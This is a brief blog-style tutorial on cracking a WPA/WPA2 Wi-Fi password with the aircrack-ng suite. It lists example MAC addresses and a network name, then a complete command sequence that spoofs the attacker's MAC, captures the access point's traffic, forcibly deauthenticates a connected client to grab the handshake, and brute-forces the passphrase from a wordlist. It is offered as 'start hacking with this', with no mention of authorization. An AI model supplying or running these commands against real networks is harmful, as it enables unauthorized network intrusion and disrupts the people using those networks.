In This Tutorial, Here Is What Was Used
1) MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
2) MAC address of the wireless client using WPA2 OR WPA: 00:0F:B5:FD:FB:C2
3) BSSID (MAC address of access point): 00:14:6C:7E:40:80
4) ESSID (Wireless network name): teddy
5) Access point channel: 9
6) Wireless interface: wlan0/mon0
Now Open Terminal And Start Hacking With This
- airmon-ng stop wlan0
- ifconfig wlan0 down
- macchanger --mac 00:11:22:33:44:55 wlan0
- ifconfig wlan0 up
- airmon-ng start wlan0
- airodump-ng mon0
- airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0
- aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
- aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
And You Have Done This :)
Comments
Post a Comment
plz add ur comment here